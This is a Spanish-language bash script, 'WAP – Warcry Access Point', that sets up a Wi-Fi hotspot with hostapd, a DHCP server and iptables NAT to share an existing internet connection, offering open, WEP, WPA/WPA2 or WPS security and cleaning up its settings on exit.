# Este programa se distribuye SIN GARANTIA de ningun tipo. #
# #
###############################################################################
#funcion que muestra el titulo
function mostrarheader(){
echo -e '\e[1;32m#########################################################'
echo -e '\e[1;32m# #'
echo -e '\e[1;32m#''\e[1;33m WAP' '\e[1;32m #'
echo -e '\e[1;32m#''\e[1;33m Warcry Access Point''\e[1;32m #'
echo -e '\e[1;32m# #'
echo -e '\e[1;32m#########################################################\e[0m'
}
# funcion que activa y configura todos los servicios
function activacion(){
# establecimiento configuracion dhcp
echo "default-lease-time 600;
max-lease-time 7200;
subnet 172.168.0.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 172.168.0.255;
option routers 172.168.0.1;
option domain-name-servers 8.8.8.8;
range 172.168.0.2 172.168.0.254;
}" > /tmp/dhcpd.conf
clear
mostrarheader
# activamos el ap en background
hostapd -B /tmp/hostapd.conf >/dev/null 2>&1
sleep 1
ifconfig $device 172.168.0.1 netmask 255.255.255.0
ifconfig $device mtu 1400
route add -net 172.168.0.0 netmask 255.255.255.0 gw 172.168.0.1
sleep 1
# configuracion de iptables
## borrado de reglas de iptables
iptables -F
iptables -X
iptables -Z
iptables -t nat -F
## establecemos politica por defecto
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -t nat -P PREROUTING ACCEPT
iptables -t nat -P POSTROUTING ACCEPT
# el localhost se deja
iptables -A INPUT -i lo -j ACCEPT
# al firewall tenemos acceso desde la red local
iptables -A INPUT -s 172.168.0.0/24 -i $device -j ACCEPT
# ahora hacemos enmascaramiento de la red local
iptables -t nat -A POSTROUTING -s 172.168.0.0/24 -o $device1 -j MASQUERADE
# activamos forwarding
echo "1" > /proc/sys/net/ipv4/ip_forward
# activamos el dhcp
xterm -iconic -e dhcpd -d -f -cf /tmp/dhcpd.conf $device
}
# funcion para resetear todos los interfaces
reset() {
if [ "$device" ]; then
# Identificamos el driver de la interface seleccionada
DRIVER="$(basename "$(ls -l "/sys/class/net/$device/device/driver")")"
if [ ! "$DRIVER" ] && [ -d "/sys/class/net/tiwlan0/wireless" ]; then
DRIVER="WiLink"
fi
# Se desmonta y se vuelve a montar el driver
rmmod -f "$DRIVER" >/dev/null 2>&1
sleep 1
modprobe "$DRIVER" >/dev/null 2>&1
sleep 1
# Se pone la interface "up" para evitar problemas
# con algunos adaptadores inalámbricos
ifconfig "$device" up >/dev/null 2>&1
fi
if [ "$device1" ]; then
# Identificamos el driver de la interface seleccionada
DRIVER="$(basename "$(ls -l "/sys/class/net/$device1/device/driver")")"
if [ ! "$DRIVER" ] && [ -d "/sys/class/net/tiwlan0/wireless" ]; then
DRIVER="WiLink"
fi
# Se desmonta y se vuelve a montar el driver
rmmod -f "$DRIVER" >/dev/null 2>&1
sleep 1
modprobe "$DRIVER" >/dev/null 2>&1
sleep 1
# Se pone la interface "up" para evitar problemas
# con algunos adaptadores inalámbricos
ifconfig "$device1" up >/dev/null 2>&1
fi
}
function Salir() {
blacklist-iface "$device" ON >/dev/null 2>&1
exit
}
trap "Salir" SIGHUP SIGILL
clear
mostrarheader
# comprobacion de usuario
if [ $(whoami) != "root" ]; then
echo -e '\e[1;31m
¡¡¡ Debes ser root para ejecutar WAP !!!
Prueba: sudo bash wap o sudo sh wap
\e[0m'
sleep 5
exit 1
fi
# seleccion de parametros
echo -e '\e[1;37m \e[0m'
# detectamos el inteface que esta conectado a internet
echo -e '\e[1;37m
detectando conexion a internet...
\e[0m'
sleep 1
if [ -z ]; then
device1=$(ip route show|awk '(NR == 1) { print $5}')
fi
# si no hay interface conectado a internet
if [ $device1 == "link" ]; then
echo -e '\e[1;31m
¡¡¡ No se encontró ningún interface conectado a internet !!!
No se puede continuar.
\e[0m'
sleep 5
exit 1
fi
# si hay interface conectado a internet
echo -e '\e[1;36m
se ha seleccionado \e[0m' $device1
sleep 2
clear
mostrarheader
echo -e '\e[1;34m
WAP es una herramienta para crear un punto de acceso con
una interface wifi y proporcionar internet mediante un
puente con otra interface de tu pc que previamente este
conectada a internet mediante un gestor de conexion como wicd
\e[0m'
# crea lista con los interfaces wifi del sistema
if [ -z ]; then
interfaceList=$(iwconfig 2>/dev/null |grep "802.11" |grep -v Monitor |grep -v $device1 |awk '{print $1}')
fi
# si no hay interfaces wireless
echo -e '\e[1;36m'
if [ -z "$interfaceList" ]; then
echo -e '\e[1;31m
¡¡¡ No se encontró ningún interface wireless o en mode Managed !!!
No se puede continuar.
\e[0m'
sleep 5
exit 1
fi
echo
# crea array con dispositivos WiFi existentes
i=0
for interface in $interfaceList; do
if [ -z "`iwconfig 2>/dev/null |grep -A1 $interface|grep -i "Mode:Monitor"`" ]; then
deviceList[i]=$interface
i=`expr $i + 1`
fi
done
# muestra menu para elegir dispositivo
echo -e '\e[1;37m Selecciona el número de dispositivo WiFi que quieres utilizar
para crear el punto de acceso:\n\e[0m'
echo -e '\e[1;36m\tINTERFACE\tDRIVER\t\tFABRICANTE
\e[0m'
i=0
for device in ${deviceList[@]}; do
DRIVER="$(basename "$(ls -l "/sys/class/net/$device/device/driver")")"
FABRICANTE="$(macchanger -s $device|head -1|cut -d' ' -f6-)"
echo -e " [$i]\t$device\t\t$DRIVER\t$FABRICANTE"
i=`expr $i + 1` #let i=$i+1
done
echo -e "\n"
# read -s -N 1 n #leer un caracter en n, sin esperar intro -N 1, sin eco -s
read n #leer un caracter en n, sin esperar intro -N 1, sin eco -s
device=${deviceList[n]}
echo -e '\e[1A\e[1;36mHas seleccionado: '$device "espera...."
# proceso de limpieza
echo "
Preparando dispositivo....
"
[ "$(which blacklist-iface)" ] && blacklist-iface $device OFF >/dev/null 2>&1
# Eliminando interfaces en modo monitor
interfaces=$(ifconfig|awk '/^mon/ {print $1}')
if [ "$interfaces" != "" ]; then
for monx in $interfaces; do
airmon-ng stop $monx >/dev/null 2>&1
done
fi
ifconfig $device down >/dev/null 2>&1
ifconfig $device up >/dev/null 2>&1
sleep 1
clear
mostrarheader
# definimos el nombre del ap
echo -e '\e[1;31m
Selección de Essid (nombre de la red de tu Access Point)
\e[0m''\e[1;37mejemplo:\e[0m' '\e[1;36mPrueba_AP\e[0m'
echo -e '\e[1;37m
Teclea el Essid
\e[0m'
read red
clear
mostrarheader
# seleccionamos el canal que utilizara nuestro ap
echo -e '\e[1;31m
Selección de canal (si se esta utilizando otro interface wifi para obtener
internet se recomienda dejar unos 5 canales de separacion)
\e[0m''\e[1;37mejemplo:\e[0m' '\e[1;36m10\e[0m'
echo -e '\e[1;37m
Teclea el canal (1-11)
\e[0m'
read canal
clear
mostrarheader
echo -e '\e[1;31m
Selección de cifrado
\e[0m''\e[1;37mejemplo:\e[0m' '\e[1;36m 2\e[0m'
echo -e '\e[1;31m
[1] OPEN
[2] WEP
[3] WPA
[4] WPA2
[5] WPA/WPA2
[6] WPA/WPA2 con WPS
\e[0m'
echo -e '\e[1;37m
Teclea el numero de cifrado que deseas
\e[0m'
read cifrado
case $cifrado in
1 ) echo "# Define interface
interface=$device
# Select driver
driver=nl80211
# Set access point name
ssid=$red
# Set access point harware mode to 802.11g
hw_mode=g
# Set WIFI channel (can be easily changed)
channel=$canal" > /tmp/hostapd.conf
activacion & continue >/dev/null 2>&1;;
2 ) echo -e '\e[1;37m
Teclea la clave wep (10 o 26 caracteres hexadecimales que no sean todo ceros)
ejemplo 1a2b3c4d5e
\e[0m'
read wepkey
echo "# Define interface
interface=$device
# Select driver
driver=nl80211
# Set access point name
ssid=$red
# Set access point harware mode to 802.11g
hw_mode=g
# Set WIFI channel (can be easily changed)
channel=$canal
# Enable WEP
wep_default_key=0
wep_key0=$wepkey" > /tmp/hostapd.conf
activacion & continue >/dev/null 2>&1;;
3 ) echo -e '\e[1;37m
Teclea la clave wpa (entre 8 y 63 caracteres)
\e[0m'
read wpakey
echo "# Define interface
interface=$device
# Select driver
driver=nl80211
# Set access point name
ssid=$red
# Set access point harware mode to 802.11g
hw_mode=g
# Set WIFI channel (can be easily changed)
channel=$canal
# Enable WPA2 only (1 for WPA, 2 for WPA2, 3 for WPA + WPA2)
wpa=1
wpa_passphrase=$wpakey" > /tmp/hostapd.conf
activacion & continue >/dev/null 2>&1;;
4 ) echo -e '\e[1;37m
Teclea la clave wpa (entre 8 y 63 caracteres)
\e[0m'
read wpakey
echo "# Define interface
interface=$device
# Select driver
driver=nl80211
# Set access point name
ssid=$red
# Set access point harware mode to 802.11g
hw_mode=g
# Set WIFI channel (can be easily changed)
channel=$canal
# Enable WPA2 only (1 for WPA, 2 for WPA2, 3 for WPA + WPA2)
wpa=2
wpa_passphrase=$wpakey" > /tmp/hostapd.conf
activacion & continue >/dev/null 2>&1;;
5 ) echo -e '\e[1;37m
Teclea la clave wpa (entre 8 y 63 caracteres)
\e[0m'
read wpakey
echo "# Define interface
interface=$device
# Select driver
driver=nl80211
# Set access point name
ssid=$red
# Set access point harware mode to 802.11g
hw_mode=g
# Set WIFI channel (can be easily changed)
channel=$canal
# Enable WPA2 only (1 for WPA, 2 for WPA2, 3 for WPA + WPA2)
wpa=3
wpa_passphrase=$wpakey" > /tmp/hostapd.conf
activacion & continue >/dev/null 2>&1;;
6 ) echo -e '\e[1;37m
Teclea la clave wpa (entre 8 y 63 caracteres)
\e[0m'
read wpakey
echo -e '\e[1;37m
Teclea el pin (ejemplo 12345670)
\e[0m'
read pin
echo "# Define interface
interface=$device
# Select driver
driver=nl80211
# Set access point name
ssid=$red
# Set access point harware mode to 802.11g
hw_mode=g
# Set WIFI channel (can be easily changed)
channel=$canal
# Enable WPA2 only (1 for WPA, 2 for WPA2, 3 for WPA + WPA2)
wpa=3
wpa_passphrase=$wpakey
# Enable WPS
eap_server=1
wps_state=2
ap_pin=$pin" > /tmp/hostapd.conf
activacion & continue >/dev/null 2>&1;;
esac
sleep 2
clear
mostrarheader
echo -e '\e[1;31m
Pulsa cualquier tecla para finalizar
¡¡¡ NO CIERRES LA VENTANA DIRECTAMENTE
PRESIONA CUALQUIER TECLA PARA FINALIZAR
O NO SE EJECUTARA LA LIMPIEZA, LO QUE PUEDE
PROVOCAR CONFLICTOS CON OTRAS APLICACIONES !!!
\e[0m'
read -N 1
# eliminando demonios y archivos temporales creados
killall dhcpd
killall hostapd
killall dhcpcd
rm -f /tmp/dhcpd.conf
rm -f /tmp/hostapd.conf
# eliminando reglas de iptables
iptables -F
iptables -X
iptables -Z
iptables -t nat -F
# eliminando forwarding
echo "0" > /proc/sys/net/ipv4/ip_forward
# reseteando interfaces
reset
Salir
#Fin